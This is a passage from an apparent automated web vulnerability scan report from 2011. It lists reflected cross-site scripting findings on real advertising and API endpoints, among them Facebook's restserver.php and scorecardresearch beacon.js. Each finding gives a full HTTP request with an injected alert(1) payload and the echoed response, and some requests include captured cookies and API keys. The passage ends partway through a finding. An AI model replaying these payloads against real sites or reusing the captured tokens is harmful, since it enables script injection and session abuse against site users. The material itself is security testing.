Set-Cookie: mojo3=13966:2151/14302:28901/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113; expires=Wed, 13-Feb-2013 5:55:16 GMT; path=/; domain=.mediaplex.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 458
Date: Mon, 14 Feb 2011 01:37:45 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/3/0/*/u;234423007;0-0;1;3619820;10408-336/850;40033784/40051571/1;;~okv=;ad=ss;ad=bb;ad=hp;sz=160x600,300x250,336x850;pos=ad6;poe=yes;orbit=y;del=js;fromrss=n;rss=n;~aopt=6/0/ff/0;~sscs=?&f4bde';alert(1)//6d86e68f733=1http://altfarm.mediaplex.com/ad/ck/13966-88527-2151-6?mpt=2157694">
...[SNIP]...

1.77. http://api.bizographics.com/v1/profile.json [&callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the &callback request parameter is copied into the HTML document as plain text between tags. The payload b93bd<script>alert(1)</script>a6d294015c8 was submitted in the &callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoDatab93bd<script>alert(1)</script>a6d294015c8&api_key=r9t72482usanbp6sphprhvun HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/0_0_WP_2400_NewsReel.html?baseDocId=SB10001424052748704329104576138271281667798
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KXTjLwm8dPXkaj5XcunNcMDa7Re6IGD4lLFy3bMisHmNbAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRCZ1UAhIHgQp0s9VPhT38SEVUJBxdqAyDQmBis3kUIRCUjpBQhSgJ05dWzEQqSCDqAipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Date: Mon, 14 Feb 2011 01:36:39 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7Kb8iiqRrrqiiplaj5XcunNcMDa7Re6IGD4lBFocpwBNElwAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtSkshqfjmnjnFGDBYisbP9XVEVUJBxdqAyA0iimflEzxWuEyFjlqKSSPxZXQiiFVMClmMipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 219
Connection: keep-alive

dj.module.ad.bio.loadBizoDatab93bd<script>alert(1)</script>a6d294015c8({"bizographics":{"industry":[{"code":"business_services","name":"Business Services"}],"location":{"code":"texas","name":"USA - Texas"}},"usage":1});

1.78. http://api.bizographics.com/v1/profile.json [api_key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 36839<script>alert(1)</script>f9aaf154604 was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData&api_key=r9t72482usanbp6sphprhvun36839<script>alert(1)</script>f9aaf154604 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/0_0_WP_2400_NewsReel.html?baseDocId=SB10001424052748704329104576138271281667798
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KXTjLwm8dPXkaj5XcunNcMDa7Re6IGD4lLFy3bMisHmNbAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRCZ1UAhIHgQp0s9VPhT38SEVUJBxdqAyDQmBis3kUIRCUjpBQhSgJ05dWzEQqSCDqAipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Mon, 14 Feb 2011 01:36:41 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 84
Connection: keep-alive

Unknown API key: (r9t72482usanbp6sphprhvun36839<script>alert(1)</script>f9aaf154604)

1.79. http://api.dimestore.com/viapi [id parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://api.dimestore.com
Path:   /viapi

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 60c4a<a>9e2f8f9272e was submitted in the id parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /viapi?action=pixel&id=64105156860c4a<a>9e2f8f9272e HTTP/1.1
Host: api.dimestore.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=794;c=529/16;s=5;d=9;w=300;h=250
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: respondentId=ec3090ffba90412a8149082ce035a177; respondentEmail=""; IgUsFjsrORc3NyILDBo6HychGw%3D%3D=EyADRWJEY0NpdVl%2BSWFG; Mlo9CTINKhomHCQJNys5Fzc3Igs%3D=dkd8VQ%3D%3D; Mlo9CTINKhomHCQJNysrEzEh=EwwpRRURLVJ1dkl%2FVWJFb0Nyfl1%2BX2BGbzUIEEJ9UGBEb1oMKg0kBHMnOxMrIAg%2FAXMgJh8gbQ%3D%3D%0A; IBogOiIBKgExLQYjCzIdPRcaNwEiEj0rfkJ2c1E%3D=dQ%3D%3D; pixel_681051260=1; pixel_7668dede487ec485)(sn=*=1; pixel_a11059176=1

Response

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Mon, 14 Feb 2011 01:37:25 GMT
Content-Type: text/xml
Connection: keep-alive
Set-Cookie: pixel_64105156860c4a<a>9e2f8f9272e=1; Expires=Tue, 14-Feb-2012 01:37:25 GMT
Content-Length: 55

// DIMESTORE PIXEL OK -- 64105156860c4a<a>9e2f8f9272e

1.80. http://api.echoenabled.com/v1/search [q parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://api.echoenabled.com
Path:   /v1/search

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload befc2<a>168ce8e9d57 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /v1/search?callback=jsonp1297694123476&q=childrenof%3Ahttp%3A%2F%2Fwww.aboutecho.com%2Fe2%2Ftweets%2Fe2launch+user.id%3Awww.twitter.com%2Fchrissaad%2Cwww.twitter.com%2Fcailloux2007%2Cwww.twitter.com%2Fwadcom%2Cwww.twitter.com%2Flevwalkin%2Cwww.twitter.com%2Fechoenabled%2Cwww.twitter.com%2Fechostatus%2Cwww.twitter.com%2Fkhrisloux+tags%3Aecho+-state%3ASystemFlagged%2CModeratorDeleted+children+-state%3ASystemFlagged%2CModeratorDeleted+sortOrder%3AreverseChronological+itemsPerPage%3A4+sanitizeHTML%3Afalse+befc2<a>168ce8e9d57&appkey=prod.echocorp HTTP/1.1
Host: api.echoenabled.com
Proxy-Connection: keep-alive
Referer: http://aboutecho.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Server: Yaws/1.85 Yet Another Web Server
Date: Mon, 14 Feb 2011 14:34:44 GMT
Content-Length: 139
Content-Type: application/x-javascript; charset="utf-8"

jsonp1297694123476({ "result": "error", "errorCode": "wrong_query", "errorMessage": "Parse error near: \"befc2<a>168ce8e9d57\" at 424" });

1.81. http://api.facebook.com/restserver.php [method parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The value of the method request parameter is copied into the HTML document as plain text between tags. The payload 51f5d<img%20src%3da%20onerror%3dalert(1)>50bd65752c8 was submitted in the method parameter. This input was echoed as 51f5d<img src=a onerror=alert(1)>50bd65752c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /restserver.php?v=1.0&method=links.getStats51f5d<img%20src%3da%20onerror%3dalert(1)>50bd65752c8&urls=%5B%22http%3A%2F%2Fwww.legacy.com%2Flegacies%2F2011%2Fobituary-photo-gallery.aspx%3Fphoto%3Dbetty-garrette96f0%2522style%253d%2522x%253aexpression(alert(1))%2522520eb12a7af%26pid%3D148615818%22%5D&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/legacies/2011/obituary-photo-gallery.aspx?photo=betty-garrette96f0%22style%3d%22x%3aexpression(alert(1))%22520eb12a7af&pid=148615818
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dexaminer.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.examiner.com%252Fnational%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Type: text/javascript;charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Cnection: close
Date: Mon, 14 Feb 2011 01:29:50 GMT
Content-Length: 466

fb_sharepro_render({"error_code":3,"error_msg":"Unknown method","request_args":[{"key":"v","value":"1.0"},{"key":"method","value":"links.getStats51f5d<img src=a onerror=alert(1)>50bd65752c8"},{"key":"urls","value":"[\"http:\/\/www.legacy.com\/legacies\/2011\/obituary-photo-gallery.aspx?photo=betty-garrette96f0%22style%3d%22x%3aexpression(alert(1))%22520eb12a7af&pid=148615818\"]"},{"key":
...[SNIP]...

1.82. http://api.facebook.com/restserver.php [method parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The value of the method request parameter is copied into the HTML document as plain text between tags. The payload 1ca06<img%20src%3da%20onerror%3dalert(1)>7fc4ebab431e57952 was submitted in the method parameter. This input was echoed as 1ca06<img src=a onerror=alert(1)>7fc4ebab431e57952 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /restserver.php?method=fql.query&query=SELECT%20name%2Cpic_small%2Cuid%20from%20user%20WHERE%20uid%20IN%20(1292387673)&method=fql.query1ca06<img%20src%3da%20onerror%3dalert(1)>7fc4ebab431e57952&api_key=54cc5dbde0acea15cbf544d4e434acc0&format=JSON&call_id=599&v=1.0 HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/Y7YCBKX-HZn.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dexaminer.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.examiner.com%252Fnational%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Type: application/json
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Cnection: close
Date: Mon, 14 Feb 2011 01:38:38 GMT
Content-Length: 388

{"error_code":3,"error_msg":"Unknown method","request_args":[{"key":"method","value":"fql.query1ca06<img src=a onerror=alert(1)>7fc4ebab431e57952"},{"key":"query","value":"SELECT name,pic_small,uid from user WHERE uid IN (1292387673)"},{"key":"api_key","value":"54cc5dbde0acea15cbf544d4e434acc0"},{"key":"format","value":"JSON"},{"key":"call_id",
...[SNIP]...

1.83. http://api.facebook.com/restserver.php [query parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The value of the query request parameter is copied into the HTML document as plain text between tags. The payload d807b<img%20src%3da%20onerror%3dalert(1)>86106d539e46377d1 was submitted in the query parameter. This input was echoed as d807b<img src=a onerror=alert(1)>86106d539e46377d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /restserver.php?method=fql.query&query=SELECT%20name%2Cpic_small%2Cuid%20from%20user%20WHERE%20uid%20IN%20(1292387673)d807b<img%20src%3da%20onerror%3dalert(1)>86106d539e46377d1&method=fql.query&api_key=54cc5dbde0acea15cbf544d4e434acc0&format=JSON&call_id=599&v=1.0 HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/Y7YCBKX-HZn.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dexaminer.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.examiner.com%252Fnational%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=60
Content-Type: application/json
Expires: Sun, 13 Feb 2011 17:39:13 -0800
Pragma:
X-Cnection: close
Date: Mon, 14 Feb 2011 01:38:13 GMT
Content-Length: 424

{"error_code":601,"error_msg":"Parser error: unexpected 'd807b' at position 61.","request_args":[{"key":"method","value":"fql.query"},{"key":"query","value":"SELECT name,pic_small,uid from user WHERE uid IN (1292387673)d807b<img src=a onerror=alert(1)>86106d539e46377d1"},{"key":"api_key","value":"54cc5dbde0acea15cbf544d4e434acc0"},{"key":"format","value":"JSON"},{"key":"call_id","value":"599"},{"key":"v","value":"1.0"}]}

1.84. http://api.facebook.com/restserver.php [urls parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The value of the urls request parameter is copied into the HTML document as plain text between tags. The payload ec7bd<img%20src%3da%20onerror%3dalert(1)>a0b94148a55 was submitted in the urls parameter. This input was echoed as ec7bd<img src=a onerror=alert(1)>a0b94148a55 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fwww.legacy.com%2Flegacies%2F2011%2Fobituary-photo-gallery.aspx%3Fphoto%3Dbetty-garrette96f0%2522style%253d%2522x%253aexpression(alert(1))%2522520eb12a7af%26pid%3D148615818%22%5Dec7bd<img%20src%3da%20onerror%3dalert(1)>a0b94148a55&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/legacies/2011/obituary-photo-gallery.aspx?photo=betty-garrette96f0%22style%3d%22x%3aexpression(alert(1))%22520eb12a7af&pid=148615818
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dexaminer.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.examiner.com%252Fnational%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Sun, 13 Feb 2011 17:32:01 -0800
Pragma:
X-Cnection: close
Date: Mon, 14 Feb 2011 01:30:01 GMT
Content-Length: 482

fb_sharepro_render({"error_code":114,"error_msg":"param urls must be an array.","request_args":[{"key":"v","value":"1.0"},{"key":"method","value":"links.getStats"},{"key":"urls","value":"[\"http:\/\/www.legacy.com\/legacies\/2011\/obituary-photo-gallery.aspx?photo=betty-garrette96f0%22style%3d%22x%3aexpression(alert(1))%22520eb12a7af&pid=148615818\"]ec7bd<img src=a onerror=alert(1)>a0b94148a55"},{"key":"format","value":"json"},{"key":"callback","value":"fb_sharepro_render"}]});

1.85. http://api.js-kit.com/v1/count [q parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://api.js-kit.com
Path:   /v1/count

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload d0e85<a>179ca1bd15e was submitted in the q parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /v1/count?q=d0e85<a>179ca1bd15e&callback=Reuters.utils.socialCallback&appkey=prod.reuters.com HTTP/1.1
Host: api.js-kit.com
Proxy-Connection: keep-alive
Referer: http://uk.reuters.com/article/2011/02/13/us-bafta-idUKTRE71C1YB20110213
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Server: Yaws/1.85 Yet Another Web Server
Date: Mon, 14 Feb 2011 01:36:03 GMT
Content-Length: 148
Content-Type: application/x-javascript; charset="utf-8"

Reuters.utils.socialCallback({ "result": "error", "errorCode": "wrong_query", "errorMessage": "Parse error near: \"d0e85<a>179ca1bd15e\" at 19" });

1.86. http://ar.voicefive.com/b/rc.pli [func parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 56ff7<script>alert(1)</script>c505676b722 was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction56ff7<script>alert(1)</script>c505676b722&n=ar_int_p85001580&1297650567782 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.8;sz=160x600;click0=http://a.tribalfusion.com/h.click/atmNvBUVn55rymoWArXTew3dYHPVjC2mMLpHEyVHbaXrfcYF7l0a6pPrJFTbv4THYWmbZbuQFZbmXTQt5TUk4Ev3oTBIYUJ8WHbXmAQCmV7tmWrJ3TUl5teo5mBZbnFbZaXsbQXs3Y1c7npEbP3br5Wr7DVAMTRHvguWoXW8/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SDYN_2011Q1/160/L41/446634589/x90/USNetwork/RS_SDYN_2011Q1_TF_PR_DEF_160/RadioShack_SDYN_2011Q1.html/72634857383030695a694d41416f6366?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/160/L44/1473307965/x90/USNetwork/RS_SELL_2011Q1_TF_CT_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1473307965?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de&#41; ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p84068139=exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&; ar_p86183782=exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&; ar_p84532700=exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&; ar_s_p84053757=1->1297606675; ar_p84053757=exp=6&initExp=Sun Feb 13 14:17:53 2011&recExp=Sun Feb 13 14:38:09 2011&prad=1160020&arc=1422863&; ar_p85001580=exp=53&initExp=Wed Jan 26 20:14:29 2011&recExp=Mon Feb 14 02:28:38 2011&prad=58087461&arc=40400763&; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1297650518%2E886%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 14 Feb 2011 02:28:49 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteraction56ff7<script>alert(1)</script>c505676b722("");

1.87. http://b.scorecardresearch.com/beacon.js [c1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload a8148<script>alert(1)</script>634abd05f4d was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3a8148<script>alert(1)</script>634abd05f4d&c2=6035338&c3=%EBuy!&c4=%ECid!&c5=57892644&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 21 Feb 2011 01:26:36 GMT
Date: Mon, 14 Feb 2011 01:26:36 GMT
Connection: close
Content-Length: 3596

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
MSCORE.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3a8148<script>alert(1)</script>634abd05f4d", c2:"6035338", c3:".uy!", c4:".id!", c5:"57892644", c6:"", c10:"", c15:"", c16:"", r:""});

1.88. http://b.scorecardresearch.com/beacon.js [c10 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 1a8b2<script>alert(1)</script>16a0b4321e1 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=15&c4=12414&c5=&c6=&c10=31476441a8b2<script>alert(1)</script>16a0b4321e1&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 21 Feb 2011 01:26:40 GMT
Date: Mon, 14 Feb 2011 01:26:40 GMT
Connection: close
Content-Length: 3594

